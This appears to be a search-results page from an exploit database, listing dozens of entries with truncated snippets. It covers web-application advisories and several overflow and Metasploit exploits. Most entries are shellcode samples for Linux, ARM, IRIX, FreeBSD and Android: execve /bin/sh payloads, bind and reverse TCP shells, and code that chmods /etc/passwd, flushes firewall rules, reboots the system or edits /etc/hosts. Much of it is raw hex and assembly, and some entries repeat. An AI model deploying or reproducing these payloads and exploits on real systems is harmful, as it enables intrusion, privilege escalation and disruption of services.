39001 matches found
Adminer v4.3.1 Server Side Request Forgery Exploit
Exploit for multiple platform in category web applications + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/ADMINER-UNAUTHENTICATED-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: apparition security Vendor: ==============...
Zimbra Collaboration Suite Cross Site Scripting Vulnerability
Exploit for php platform in category web applications COMPASS SECURITY ADVISORY https://www.compass-security.com CVE ID : CVE-2017-8802 Product: Zimbra Collaboration Suite ZCS 1 Vendor: Synacor Inc. 2 Subject: Stored Cross-Site Scripting XSS Vulnerability Risk: High Effect: Exploitable by Anonymo...
Magento Commerce Server-Side Request Forgery Vulnerability
Exploit for php platform in category web applications Document Title: =============== Magento Commerce - SSRF & XSPA Web Vulnerability Vulnerability Class: ==================== Server Side Request Forgery Product & Service Introduction: =============================== Magento is an open source...
Magento Connect T1 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Document Title: =============== Magento Connect T1 - Claim Persistent Vulnerability Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000a! - 2.000a! Product & Servi...
Piwigo 2.8.2 / 2.9.2 Cross Site Scripting Vulnerability
Exploit for php platform in category web applications Document Title: =============== Piwigo v2.8.2 & 2.9.2 CMS - Multiple Cross Site Vulnerabilities Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500a! - 1.000a!...
Flash Operator Panel 2.31.03 Command Execution Vulnerability
Exploit for php platform in category web applications Document Title: =============== Flash Operator Panel v2.31.03 - Command Execution Vulnerability Product & Service Introduction: =============================== The most comprehensive and affordable reporting and realtime monitor package for...
ZyXEL P-660HW UDP Denial Of Service Exploit
Exploit for hardware platform in category dos / poc Exploit Title: ZyXEL P-660HW UDP fragmentation Denial of Service CVE: CVE-2018-5330 CWE: CWE-400 Exploit Author: Hosein Askari Vendor HomePage: https://www.zyxel.com/ Version : v3 Tested on: ZyXEL P-660HW Category: Network Appliance Author Mail ...
Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
/ 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 / "\x01\x30\x87\xe2" / add r3, r7, 1 / "\x13\x07\xa0\xe1" / mov r0, r3, lsl r7 / "\x01\x20\x83\xe2" / add r...
Kentico CMS 11.0 - Buffer Overflow Vulnerability
Exploit for windows platform in category dos / poc Document Title: =============== Kentico CMS v11.0 - Stack Buffer Overflow Vulnerability CVE-ID: ======= CVE-2018-5282 Vulnerability Class: ==================== Buffer Overflow Current Estimated Price: ======================== 2.000€ - 3.000€...
IRIX - execve (/bin/sh -c) Shellcode (72 bytes)
char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 / "\xaf\xe4\xfb\x24" / sw $a0,-1244$ra / "\x23\xe6\xf7\x48" / addi $a2,$ra,-2232 /...
Linux/StrongARM - setuid() Shellcode (20 bytes)
/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...
IRIX - execve (/bin/sh) Shellcode (68 bytes)
/ 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$sp / / a2 = char envp = NULL / 0x240fffcb, / li $t7, -53 / 0x01e07827, / nor...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
macOS - process_policy Stack Leak Through Uninitialized Field Exploit
Exploit for macOS platform in category dos / poc / The syscall processpolicyscope=PROCPOLICYSCOPEPROCESS, action=PROCPOLICYACTIONGET, policy=PROCPOLICYRESOURCEUSAGE, policysubtype=PROCPOLICYRUSAGECPU, attrp=, targetpid=0, targetthreadid= causes 4 bytes of uninitialized kernel stack memory to be...
Linux/SPARC - setreuid(0,0) + execve(/bin/sh) Shellcode (64 bytes)
/ Linux/SPARC setreuid0,0; execve of /bin/sh shellcode. / char c0de = / anathema / / setreuid0,0; / "\x82\x10\x20\x7e" / mov 126, %g1 / "\x92\x22\x40\x09" / sub %o1, %o1, %o1 / "\x90\x0a\x40\x09" / and %o1, %o1, %o0 / "\x91\xd0\x20\x10" / ta 0x10 / / execve of /bin/sh / "\x2d\x0b\xd8\x9a" / sethi...
Linux/SPARC - setreuid(0,0) + standard execve() Shellcode (72 bytes)
/ Linux/SPARC setreuid0, 0; necessary, /bin/sh drops privs, standard execve. / char c0de = / by michel kaempf / / setuid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x17\x91\xd0\x20\x10" / setgid 0 ; / "\x90\x1a\x40\x09\x82\x10\x20\x2e\x91\xd0\x20\x10" / Aleph One : /...
PyroBatchFTP < 3.19 - Buffer Overflow Exploit
Exploit for windows platform in category dos / poc ============================================= MGC ALERT 2018-001 - Original release date: December 22, 2017 - Last revised: January 12, 2018 - Discovered by: Manuel García Cárdenas - Severity: 7,5/10 CVSS Base Score...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
/ ; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x8664 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa @OsandaMalith global start section .text start: ;open xor rax, rax add rax, 2 ; open syscall xor rdi, rdi xor rsi, rsi push...
Linux/StrongARM - execve (/bin/sh) Shellcode (47 bytes)
/ 47 byte StrongARM/Linux execve shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x1c\x30\x8f\xe2" / add r3, pc, 28 0x1c / "\x04\x30\x8d\xe5" / str r3, sp, 4 / "\x08\x20\x8d\xe5" / str r2, sp, 8 / "\x13\x02\xa0\xe1" / mov r0, r3, lsl r2 / "\x07\x20\xc3\xe5" / strb r2, r...
Linux/x86-64 - execve (/sbin/iptables, [/sbin/iptables, -F], NULL) Shellcode (43 bytes)
/ section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f push rbx push rsp pop rdi push rdx push rcx push rdi push rsp pop rsi ; execve"/sbin/iptables", "/sbin/iptables", "-F",...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
/ global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push rbx push rsp pop rdi xor rsi,rsi mov sil,4 sal rsi,8 mov sil,1 syscall ;write push rax pop rdi push 1 pop rax jmp data...
Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes)
/ Title: Add map in /etc/hosts file - 79 bytes Date: 2015-03-02 Architecture: armv6l GNU/Linux Website: http://osandamalith.wordpress.com E-Mail: osandacatunseen.is Author: Osanda Malith Jayathissa @OsandaMalith hosts: file format elf32-littlearm Disassembly of section .text: 00008054 : 8054:...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
/ global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code = "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05"; // cha...
IRIX - stdin-read Shellcode (40 bytes)
/ 40 byte MIPS/Irix PIC stdin-read shellcode. -scut/teso / unsigned long int shellcode = 0x24048cb0, / li $a0, -0x7350 / / dpatch: / 0x0490ffff, / bltzal $a0, dpatch / 0x2804ffff, / slti $a0, $zero, -1 / 0x240fffe3, / li $t7, -29 / 0x01e07827, / nor $t7, $t7, $zero / 0x03ef2821, / addu $a1, $ra,...
Linux/SuperH (sh4) - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (132 bytes)
/ Bind /bin/sh on port 31337 SH4 - 132bytes main: mov 102,r3 mov 2,r4 mov 1,r5 xor r6,r6 mov.l r6,@-r15 mov.l r5,@-r15 mov.l r4,@-r15 mov 1,r4 mov r15,r5 trapa 19 mov r0,r4 mov r0,r8 xor r2,r2 mov.l r2,@-r15 mov 105,r2 mov.b r2,@-r15 mov 122,r2 mov.b r2,@-r15 xor r2,r2 mov.b r2,@-r15 mov 2,r2 mov...
Linux/ARM - execve (/bin/sh, [], [0 vars]) Shellcode (35 bytes)
/ Title : Linux/ARM - execve"/bin/sh", , 0 vars - 35 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Linux/ARM - creat(/root/pwned, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - creat"/root/pwned", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
/ This ARM Thumb sc connects to a given IP and port with a shell. Intended for use with Android hence /system/bin/sh. Connects to the provided IP and port with a shell no null bytes in the code, but does this really matter these days? it could be fixed with just a few instructions. Released to th...
Taxi Booking Script 1.0 - Cross-site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Taxi Booking Script v1.0 - Cross-site Scripting XSS Vendor Homepage: https://www.phpjabbers.com/taxi-booking-script/ Software Link: Demo:...
Linux/x86-64 - Execute /bin/sh Shellcode (27 bytes)
/ Execute /bin/sh - 27 bytes Dad 0x7ffff7aeff20 : mov eax,0x3b ; 0x7ffff7aeff25 : syscall ; main: ;mov rbx, 0x68732f6e69622f2f ;mov rbx, 0x68732f6e69622fff ;shr rbx, 0x8 ;mov rax, 0xdeadbeefcafe1dea ;mov rbx, 0xdeadbeefcafe1dea ;mov rcx, 0xdeadbeefcafe1dea ;mov rdx, 0xdeadbeefcafe1dea xor eax, ea...
Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Xnami 1.0 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Xnami Image Sharing - Persistent XSS Vulnerability Google Dork: " Copyright 2017 xnami. " & 2018 Exploit Author: Dennis Veninga Contact Author: d.veninga at networking4all.com Vendor Homepage: bizlogicdev.com Version: 1.0 CVE-ID...
IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)
/ 364 byte MIPS/Irix PIC listening portshell shellcode. -scut/teso / unsigned long int shellcode = 0x2416fffd, / li $s6, -3 / 0x02c07027, / nor $t6, $s6, $zero / 0x01ce2025, / or $a0, $t6, $t6 / 0x01ce2825, / or $a1, $t6, $t6 / 0x240efff9, / li $t6, -7 / 0x01c03027, / nor $a2, $t6, $zero /...
ALLMediaServer 0.95 - Buffer Overflow Exploit
Exploit for windows platform in category remote exploits !/usr/bin/python Exploit Title: Stack Buffer Overflow in ALLMediaServer 0.95 Exploit Author: Mario Kartone Ciccarelli Contact: https://twitter.com/Kartone CVE: CVE-2017-17932 Thanks to PoC: https://www.exploit-db.com/exploits/43406/ Softwar...
Linux/SuperH (sh4) - execve(/bin/sh, 0, 0) Shellcode (19 bytes)
/ | Title: Linux/SuperH - sh4 execve"/bin/sh", 0, 0 - 19 bytes | Date: 2011-06-22 | Tested on: Debian-sh4 2.6.32-5-sh7751r | Author: Florian Gaultier - agix - twitter: @Agixid | | http://shell-storm.org / include include int main char shell = "\x0b\xe3"// mov 11,r3 "\x02\xc7"// mova @10,pc,r0...
Linux/ARM - execve (/bin/sh,NULL,0) Shellcode (31 bytes)
/ Title: Linux/ARM - execve"/bin/sh",NULL,0 - 31 bytes Date: 2010-08-31 Tested: ARM926EJ-S rev 5 v5l Author: Jonathan Salwan - twitter: @jonathansalwan shell-storm.org Shellcode ARM without 0x20, 0x0a and 0x00 00008054 : 8054: e28f3001 add r3, pc, 1 ; 0x1 8058: e12fff13 bx r3 805c: 4678 mov r0, p...
FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)
/ -------------- FreeBSD/x86 - execv"/bin/sh" 23 bytes ------------------------- AUTHOR : Tosh OS : BSDx86 Tested on FreeBSD 8.1 EMAIL : email protected / include include char shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e\x89\xe3\x50" "\x54\x53\xb0\x3b\x50\xcd\x80"; int...
Parity Browser < 1.6.10 - Bypass Same Origin Policy Vulnerability
Exploit for multiple platform in category local exploits VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-18016 Version: 0.3 Date: Jun 16th, 2017 Tag: parity same origin policy bypass webproxy token reuse Overview -------- Name: parity Vendor: paritytech...
LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow Exploit
Exploit for windows platform in category remote exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LabF nfsAxe 3.7 FTP Client Stack Buffer Overflow', 'Description' = %q This module exploi...
FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)
/ Gitsnik, @dracyrys FreeBSD x8664 execve, 28 bytes / C source: char code = \ "\x48\x31\xc9\x48\xf7\xe1\x04\x3b\x48\xbb" "\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x52\x53" "\x54\x5f\x52\x57\x54\x5e\x0f\x05"; Intel Assembly: global start ; ; 28 byte execve FreeBSD x8664 ; ; gitsnik@bsd64$ nasm -f elf64...
Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon Exploit
Exploit for Android platform in category dos / poc This bug is similar to Jann Horn's issue https://bugs.chromium.org/p/project-zero/issues/detail?id=851 -- credit should go to him. The hardware service manager allows the registration of HAL services. These services are used by the vendor domain...
D-Link Routers 110/412/615/815 < 1.03 - service.cgi Arbitrary Code Execution Exploit
Exploit for hardware platform in category web applications !/usr/bin/python Exploit Title: D-Link WAP 615/645/815 .?.?', 'Product Page : .?' def dlinkdetection: try: r = requests.getURL, timeout=10.00 except requests.exceptions.ConnectionError: print "Error: Failed to connect to " + URL return...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...
Jungo Windriver 12.5.1 - Privilege Escalation Exploit
Exploit for windows platform in category local exploits // ConsoleApplication1.cpp : Defines the entry point for the console application. // include "stdafx.h" include include define device L"\\.\WINDRVR1251" define SPRAYSIZE 30000 typedef NTSTATUSWINAPI PNtAllocateVirtualMemory HANDLE...
phpCollab 2.5.1 - Unauthenticated File Upload Exploit
Exploit for php platform in category remote exploits This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'phpCollab 2.5.1 Unauthenticated File Upload', 'Description' = %q This module exploits a file...
FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)
/ Gitsnik, @dracyrys FreeBSD x8664 bindtcp with passcode, 127 bytes Passcode: R2CBw0cr / C Source: char code = \ "\x6a\x61\x58\x6a\x02\x5f\x6a\x01\x5e\x99" "\x0f\x05\x48\x97\xba\xff\x02\xaa\xaa\x80" "\xf2\xff\x52\x48\x89\xe6\x99\x04\x66\x80" "\xc2\x10\x0f\x05\x04\x6a\x0f\x05\x04\x1e"...
MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service Vulnerability
Exploit for multiple platform in category dos / poc VuNote ====== Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-8798 Version: 0.6 Date: May 1st, 2017 Tag: miniupnpc getHTTPResponse chunked encoding integer signedness error Overview -------- Name: miniupnpc Vendor: Thomas...
FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)
/ Title: FreeBSD 8.0-RELEASE/x86 '//sbin/pfctl -F all Shellcode 47 Bytes' Type: Shellcode Author: antrhacks Platform: FreeBSD 8.0-RELEASE / / ASSembly 31 c0 xor %eax,%eax 50 push %eax 68 2d 46 61 6c push $0x6c61462d 89 e1 mov %esp,%ecx 50 push %eax 68 66 63 74 6c push $0x6c746366 68 69 6e 2f 70...
FreeBSD/x86 - reboot() Shellcode (15 Bytes)
/ FreeBSD reboot shellcode This will halt a system, which takes it offline until someone reboots it. Written by zillion at safemode.org / char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret; ret = int &ret + 2; ret = intshellcode;...
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
.section .text .global start start: .ARM add r3, pc, 1 // switch to thumb mode bx r3 .THUMB // socket2, 1, 0 mov r0, 2 mov r1, 1 sub r2, r2, r2 // set r2 to null mov r7, 200 // r7 = 281 socket add r7, 81 // r7 value needs to be split svc 1 // r0 = hostsockid value mov r4, r0 // save hostsockid in...